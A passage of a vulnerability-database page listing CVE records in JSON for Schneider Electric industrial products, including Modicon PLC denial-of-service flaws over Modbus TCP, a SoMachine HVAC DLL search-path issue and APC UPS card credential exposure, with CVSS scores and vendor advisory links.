"ID": "CVE-2019-6826",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "SoMachine HVAC",
"version": {
"version_data": [
{
"version_value": "v2.4.1 and earlier versions"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-426: Untrusted Search Path vulnerability exists in SoMachine HVAC v2.4.1 and earlier versions, which could cause arbitrary code execution on the system running SoMachine HVAC when a malicious DLL library is loaded by the product."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-426: Untrusted Search Path"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-04/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-04/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6826",
"datePublished": "2019-09-17T19:57:55.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.358Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6811 (GCVE-0-2019-6811)
Vulnerability from nvd – Published: 2019-09-17 19:55 – Updated: 2024-08-04 20:31- CWE-754 - Improper Check for Unusual or Exceptional Conditions (CWE-754)
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon Quantum 140 NOE771x1 |
Affected:
version 6.9 and earlier
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.258Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-253-02/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Modicon Quantum 140 NOE771x1",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "version 6.9 and earlier"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An Improper Check for Unusual or Exceptional Conditions (CWE-754) vulnerability exists in Modicon Quantum 140 NOE771x1 version 6.9 and earlier, which could cause denial of service when the module receives an IP fragmented packet with a length greater than 65535 bytes. The module then requires a power cycle to recover."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "Improper Check for Unusual or Exceptional Conditions (CWE-754)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:55:08.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-253-02/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6811",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon Quantum 140 NOE771x1",
"version": {
"version_data": [
{
"version_value": "version 6.9 and earlier"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An Improper Check for Unusual or Exceptional Conditions (CWE-754) vulnerability exists in Modicon Quantum 140 NOE771x1 version 6.9 and earlier, which could cause denial of service when the module receives an IP fragmented packet with a length greater than 65535 bytes. The module then requires a power cycle to recover."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Improper Check for Unusual or Exceptional Conditions (CWE-754)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-253-02/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-253-02/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6811",
"datePublished": "2019-09-17T19:55:08.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.258Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6810 (GCVE-0-2019-6810)
Vulnerability from nvd – Published: 2019-09-17 19:52 – Updated: 2024-08-04 20:31- CWE-284 - Improper Access Control
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| https://security.cse.iitk.ac.in/responsible-disclosure | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | BMXNOR0200H Ethernet / Serial RTU module |
Affected:
all firmware versions
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.285Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-03/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://security.cse.iitk.ac.in/responsible-disclosure"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "BMXNOR0200H Ethernet / Serial RTU module",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all firmware versions"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CWE-284: Improper Access Control vulnerability exists in BMXNOR0200H Ethernet / Serial RTU module (all firmware versions), which could cause the execution of commands by unauthorized users when using IEC 60870-5-104 protocol."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-284",
"description": "CWE-284: Improper Access Control",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-02T12:10:29.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-03/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://security.cse.iitk.ac.in/responsible-disclosure"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6810",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "BMXNOR0200H Ethernet / Serial RTU module",
"version": {
"version_data": [
{
"version_value": "all firmware versions"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "CWE-284: Improper Access Control vulnerability exists in BMXNOR0200H Ethernet / Serial RTU module (all firmware versions), which could cause the execution of commands by unauthorized users when using IEC 60870-5-104 protocol."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-284: Improper Access Control"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-03/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-225-03/"
},
{
"name": "https://security.cse.iitk.ac.in/responsible-disclosure",
"refsource": "MISC",
"url": "https://security.cse.iitk.ac.in/responsible-disclosure"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6810",
"datePublished": "2019-09-17T19:52:38.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.285Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6809 (GCVE-0-2019-6809)
Vulnerability from nvd – Published: 2019-09-17 19:50 – Updated: 2024-08-04 20:31- CWE-248 - Uncaught Exception
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580 |
Affected:
firmware version prior to V2.90
|
|
| Schneider Electric SE | Modicon M340 |
Affected:
firmware version prior to V3.10
|
|
| Schneider Electric SE | Modicon Premium |
Affected:
all versions
|
|
| Schneider Electric SE | Modicon Quantum |
Affected:
all versions
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.229Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "firmware version prior to V2.90"
}
]
},
{
"product": "Modicon M340",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "firmware version prior to V3.10"
}
]
},
{
"product": "Modicon Premium",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions"
}
]
},
{
"product": "Modicon Quantum",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "all versions"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-248: Uncaught Exception vulnerability exists in Modicon M580 (firmware versions prior to V2.90), Modicon M340 (firmware versions prior to V3.10), Modicon Premium (all versions), Modicon Quantum (all versions), which could cause a possible denial of service when reading invalid data from the controller."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-248",
"description": "CWE-248: Uncaught Exception",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:50:29.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6809",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580",
"version": {
"version_data": [
{
"version_value": "firmware version prior to V2.90"
}
]
}
},
{
"product_name": "Modicon M340",
"version": {
"version_data": [
{
"version_value": "firmware version prior to V3.10"
}
]
}
},
{
"product_name": "Modicon Premium",
"version": {
"version_data": [
{
"version_value": "all versions"
}
]
}
},
{
"product_name": "Modicon Quantum",
"version": {
"version_data": [
{
"version_value": "all versions"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-248: Uncaught Exception vulnerability exists in Modicon M580 (firmware versions prior to V2.90), Modicon M340 (firmware versions prior to V3.10), Modicon Premium (all versions), Modicon Quantum (all versions), which could cause a possible denial of service when reading invalid data from the controller."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-248: Uncaught Exception"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-134-11/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6809",
"datePublished": "2019-09-17T19:50:29.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.229Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-7820 (GCVE-0-2018-7820)
Vulnerability from nvd – Published: 2019-09-17 19:45 – Updated: 2024-08-05 06:37- CWE-255 - Credentials Management
| URL | Tags |
|---|---|
| https://www.apc.com/salestools/CCON-BFQMXC/CCON-B… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | APC UPS Network Management Card 2 AOS |
Affected:
v6.5.6
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:37:59.195Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.apc.com/salestools/CCON-BFQMXC/CCON-BFQMXC_R0_EN.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "APC UPS Network Management Card 2 AOS",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "v6.5.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A Credentials Management CWE-255 vulnerability exists in the APC UPS Network Management Card 2 AOS v6.5.6, which could cause Remote Monitoring Credentials to be viewed in plaintext when Remote Monitoring is enabled, and then disabled."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-255",
"description": "CWE-255:Credentials Management",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:45:32.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.apc.com/salestools/CCON-BFQMXC/CCON-BFQMXC_R0_EN.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2018-7820",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "APC UPS Network Management Card 2 AOS",
"version": {
"version_data": [
{
"version_value": "v6.5.6"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Credentials Management CWE-255 vulnerability exists in the APC UPS Network Management Card 2 AOS v6.5.6, which could cause Remote Monitoring Credentials to be viewed in plaintext when Remote Monitoring is enabled, and then disabled."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-255:Credentials Management"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.apc.com/salestools/CCON-BFQMXC/CCON-BFQMXC_R0_EN.pdf",
"refsource": "CONFIRM",
"url": "https://www.apc.com/salestools/CCON-BFQMXC/CCON-BFQMXC_R0_EN.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2018-7820",
"datePublished": "2019-09-17T19:45:32.000Z",
"dateReserved": "2018-03-08T00:00:00.000Z",
"dateUpdated": "2024-08-05T06:37:59.195Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-7794 (GCVE-0-2018-7794)
Vulnerability from cvelistv5 – Published: 2020-01-06 22:57 – Updated: 2026-05-29 14:05- CWE-754 - Improper Check for Unusual or Exceptional Conditions
| URL | Tags |
|---|---|
| https://www.se.com/ww/en/download/document/SEVD-2… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) |
Affected:
Modicon M580
Affected: Modicon M340 Affected: Modicon Quantum Affected: Modicon Premium (see security notification for specific versions) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:37:59.272Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2018-7794",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T14:04:08.954870Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T14:05:11.611Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "Modicon M580"
},
{
"status": "affected",
"version": "Modicon M340"
},
{
"status": "affected",
"version": "Modicon Quantum"
},
{
"status": "affected",
"version": "Modicon Premium (see security notification for specific versions)"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service when reading data with invalid index using Modbus TCP."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754: Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-06T22:57:09.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2018-7794",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"version": {
"version_data": [
{
"version_value": "Modicon M580"
},
{
"version_value": "Modicon M340"
},
{
"version_value": "Modicon Quantum"
},
{
"version_value": "Modicon Premium (see security notification for specific versions)"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service when reading data with invalid index using Modbus TCP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-754: Improper Check for Unusual or Exceptional Conditions"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01",
"refsource": "CONFIRM",
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2018-7794",
"datePublished": "2020-01-06T22:57:09.000Z",
"dateReserved": "2018-03-08T00:00:00.000Z",
"dateUpdated": "2026-05-29T14:05:11.611Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2019-6857 (GCVE-0-2019-6857)
Vulnerability from cvelistv5 – Published: 2020-01-06 22:57 – Updated: 2026-05-29 14:41- CWE-754 - Improper Check for Unusual or Exceptional Conditions
| URL | Tags |
|---|---|
| https://www.se.com/ww/en/download/document/SEVD-2… | x_refsource_CONFIRM |
| https://www.us-cert.gov/ics/advisories/icsa-20-016-01 | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) |
Affected:
Modicon M580
Affected: Modicon M340 Affected: Modicon Quantum Affected: Modicon Premium (see security notification for specific versions) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.438Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2019-6857",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T14:39:16.673211Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T14:41:14.779Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "Modicon M580"
},
{
"status": "affected",
"version": "Modicon M340"
},
{
"status": "affected",
"version": "Modicon Quantum"
},
{
"status": "affected",
"version": "Modicon Premium (see security notification for specific versions)"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service of the controller when reading specific memory blocks using Modbus TCP."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754: Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-21T23:03:43.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6857",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"version": {
"version_data": [
{
"version_value": "Modicon M580"
},
{
"version_value": "Modicon M340"
},
{
"version_value": "Modicon Quantum"
},
{
"version_value": "Modicon Premium (see security notification for specific versions)"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service of the controller when reading specific memory blocks using Modbus TCP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-754: Improper Check for Unusual or Exceptional Conditions"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01",
"refsource": "CONFIRM",
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"name": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01",
"refsource": "MISC",
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6857",
"datePublished": "2020-01-06T22:57:05.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2026-05-29T14:41:14.779Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2019-6856 (GCVE-0-2019-6856)
Vulnerability from cvelistv5 – Published: 2020-01-06 22:57 – Updated: 2026-05-29 14:37- CWE-754 - Improper Check for Unusual or Exceptional Conditions
| URL | Tags |
|---|---|
| https://www.se.com/ww/en/download/document/SEVD-2… | x_refsource_CONFIRM |
| https://www.us-cert.gov/ics/advisories/icsa-20-016-01 | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) |
Affected:
Modicon M580
Affected: Modicon M340 Affected: Modicon Quantum Affected: Modicon Premium (see security notification for specific versions) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.415Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2019-6856",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T14:36:59.205058Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T14:37:57.750Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "Modicon M580"
},
{
"status": "affected",
"version": "Modicon M340"
},
{
"status": "affected",
"version": "Modicon Quantum"
},
{
"status": "affected",
"version": "Modicon Premium (see security notification for specific versions)"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service when writing specific physical memory blocks using Modbus TCP."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754: Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-21T23:04:36.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6856",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"version": {
"version_data": [
{
"version_value": "Modicon M580"
},
{
"version_value": "Modicon M340"
